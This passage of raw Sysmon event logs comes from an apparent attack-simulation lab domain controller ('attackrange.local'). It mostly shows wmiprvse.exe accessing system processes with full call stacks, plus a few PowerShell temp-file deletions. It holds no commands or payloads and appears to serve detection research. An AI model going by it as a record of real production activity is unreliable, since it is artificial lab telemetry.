4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.717{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_mdhpk4tt.j4d.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D98-603E-99AA-00000000AD01}11584ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_pbppjcwg.0cb.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A0AA-00000000AD01}5488C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A0AA-00000000AD01}5488C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RP